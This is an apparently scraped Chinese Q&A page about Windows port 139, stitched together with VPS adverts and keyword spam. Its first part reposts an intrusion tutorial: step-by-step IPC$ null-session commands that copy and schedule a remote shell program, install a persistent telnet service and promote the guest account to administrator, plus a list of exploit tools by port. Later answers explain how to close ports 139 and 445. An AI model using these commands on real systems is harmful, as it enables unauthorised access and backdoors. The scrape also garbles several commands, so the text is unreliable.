139端口139端口有什么危害~怎么禁用139 追加30分的高分~~~

139端口  时间:2021-07-19  阅读:()

139端口入侵

我查拉135端口端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。

端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。

RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。

该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。

1:用139端口入侵 我们先确定一台存在139端口漏洞的主机。

用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。

假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。

用到两个NET命令,下面就是这两个命令的使用方法 NET VIEW? 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。

? 命令格式 view [putername | /domain[:domainname]]? 参数介绍:? <1>键入不带参数 view显示当前域的计算机列表。

? <2>putername 指定要查看其共享资源的计算机。

? <3>/domain[:domainname]指定要查看其可用计算机的域? NET USE? 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

? 命令格式 use [devicename | *] [puternamesharename[volume]]? [password | *]] [/user:[domainname]username] [[/delete] |? [/persistent:{yes | no}]]? 参数介绍:? 键入不带参数 use列出网络连接。

? devicename指定要连接到的资源名称或要断开的设备名称。

? puternamesharename服务器及共享资源的名称。

? password访问共享资源的密码。

? *提示键入密码。

/user指定进行连接的另外一个用户。

? domainname指定另一个域。

? username指定登录的用户名。

? /home将用户连接到其宿主目录? /delete取消指定网络连接。

? /persistent控制永久网络连接的使用。

? C: use \IP C: view \IP 我们已经看到对方共享了他的C,D,E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. c:>nbtstat –R 载入NBT快取 c:>nbtstat –c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。

2:4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3:80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。

(啊D的注入软件)。

4:serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。

(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 5: 554端口 用real554.exe入侵。

6:6129端口 用DameWare6129.exe入侵。

7. 6129端口 用DameWare6129.exe入侵。

8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。

9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。

(可用mydoomscan.exe查)。

10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵 1. C:& use \127.0.0.1IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。

2. C:>copy srv.exe \127.0.0.1admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:& time \127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:>at \127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5. C:& time \127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备 开始下面的命令。

6. C:> 127.0.0.1 99 这里会用到命令吧,注意端口是99。

默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一个服务!这就要用到ntlm了 7.C:>copy ntlm.exe \127.0.0.1admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:WINNTsystem32>ntlm 输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上运行)。

当出现"DONE"的时候,就说明已经启动正常。

然后使 用& start "来开启服务! 9. 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:& user guest /active:yes 将对方的Guest用户激活 11. C:& user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:& localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 们可以用guest再次访问这台计算机) /p?w=各个端口的入侵.%20&k=5lala&aid=B0100019074 QQ群:28484721

关闭139端口可以吗

关闭139端口 打开“网络连接”,鼠标右键单击“本地连接”,选择“属性”,打开“常规”的“协议(TCP/IP)”属性设置界面,并在对应的标签页面中,单击“高级”按钮,弹出高级设置窗口。

选中该窗口中“WINS”标签,在下面“NetBIOS设置”选择“TCP/IP上的NetBIOS设置”,确定后退出。

“本地连接”右键菜单的“属性”命令,把弹出的界面中,取消“Microsoft网络的文件和打印机共享”选项。

由于关掉了139端口系统会自动打开445端口代替139端口 所以还要关掉445 关闭445端口 依次单击“开始” | “运行”命令,在随后出现的运行框中,输入“regedit”命令,打开一个注册表编辑器界面。

依次单击“HKEY_LOCAL_MACHINESYSTEMCurrent- ControlSetServicesNetBTParameters”子键,在右边的子窗口中,用鼠标右键单击一下空白区域,从弹出的快捷菜单中,依次执行“新建” | “双字节值”(或者是DWORD 值)命令,并将该值命名为“SMBDeviceEnabled”。

双击“SMBDeviceEnabled”选项,在弹出的数值设置界面中,将其数值设置为“0”。

关闭注册表编辑界面,将系统重新启动,445服务端口就会被彻底关闭了。

139是个什么样的端口?需要开放吗?

每一项服务都对应相应的端口,比如众如周知的WWW服务的端口是80,smtp是25,ftp是21,win2000安装中默认的都是这些服务开启的。

对于个人用户来说确实没有必要,关掉端口也就是关闭无用的服务。

“控制面板”的“管理工具”中的“服务”中来配置。

139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。

以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机。

关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。

对于个人用户来说,可以在各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动,端口也开放了。

139端口有什么危害~怎么禁用139 追加30分的高分~~~

危害:通过139端口入侵是网络攻击中常见的一种攻击手段,一般情况下139端口开启是由于NetBIOS网络协议的使用。

NetBIOS即网络基本输入输出系统,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。

在局域网内部使用NetBIOS协议可以非常方便地实现消息通信,但是如果在上,NetBIOS就相当于一个后门程序,很多攻击者都是通过NetBIOS漏洞发起攻击。

关闭:在控制面板上点击管理工具-本地安全策略,右击"IP安全策略,在本地计算机"选择"管理IP筛选器表和筛选器操作",点添加,在对话框里填,随便写.只要你记得住.最好还是写"禁用139端口"比较看的懂.点右边的添加->下一步->源地址为"任何地址"->目的地址"我的地址"->协仪为TCP->在到此端口里填"139"就可以. 还有一个办法就是TCP/IP协仪里禁用NETBIOS.

易探云月付18元起,香港/美国/深圳/北京VPS,CN2、BGP等多线路

易探云怎么样?易探云是国内一家云计算服务商家,致力香港服务器、国内外服务器租用及托管等互联网业务,目前主要地区为运作香港BGP、香港CN2、广东、北京、深圳等地区。易探云服务器均选择当下热门线路,比如CN2 GIA、BGP线路、CN2线路等,所有云主机支持月付,并且首月优惠,年付优惠,优惠后香港沙田云服务器/独立ip/香港CN2线路,每月仅18元,188元/年。点击进入:易探云官方网站地址1、香港...

ZJI:台湾CN2/香港高主频服务器7折每月595元起,其他全场8折

ZJI原名维翔主机,是原来Wordpress圈知名主机商家,成立于2011年,2018年9月更名为ZJI,提供香港、日本、美国独立服务器(自营/数据中心直营)租用及VDS、虚拟主机空间、域名注册业务。ZJI今年全新上架了台湾CN2线路服务器,本月针对香港高主频服务器和台湾CN2服务器提供7折优惠码,其他机房及产品提供8折优惠码,优惠后台湾CN2线路E5服务器月付595元起。台湾一型CPU:Inte...

georgedatacenter:美国VPS可选洛杉矶/芝加哥/纽约/达拉斯机房,$20/年;洛杉矶独立服务器39美元/月

georgedatacenter怎么样?georgedatacenter这次其实是两个促销,一是促销一款特价洛杉矶E3-1220 V5独服,性价比其实最高;另外还促销三款特价vps,大家可以根据自己的需要入手。georgedatacenter是一家成立于2019年的美国vps商家,主营美国洛杉矶、芝加哥、达拉斯、新泽西、西雅图机房的VPS、邮件服务器和托管独立服务器业务。georgedatacen...

139端口为你推荐
360杀毒在线安装360在线杀毒怎么弄qq空间维护qq空间相关功能升级维护怎么解除?达内学院成都达内学校在什么地方?圣诞节网页制作我想在接下来的圣诞、元旦设计一个网站的宣传页面,哪里有好的公司帮我呢?iphone12或支持北斗导航iphone12是5G手机吗?微信语音在哪个文件夹微信时的语音聊天记录保存在哪一个文件夹人脸检测综述mtcnn论文中的人脸检测达到了什么样的水准云图好看吗云图好看么?修改qq密码保护如何设置QQ密码保护和修改密码发送验证码微信登录需要好友发验证码怎么办
过期域名 免费国际域名 韩国vps GGC 美国主机评论 godaddy续费优惠码 美国php主机 183是联通还是移动 nerds umax120 上海服务器 raid10 免费个人主页 宿迁服务器 乐视会员免费领取 湖南铁通 hosts文件修改 cc加速器 ddos攻击工具 更多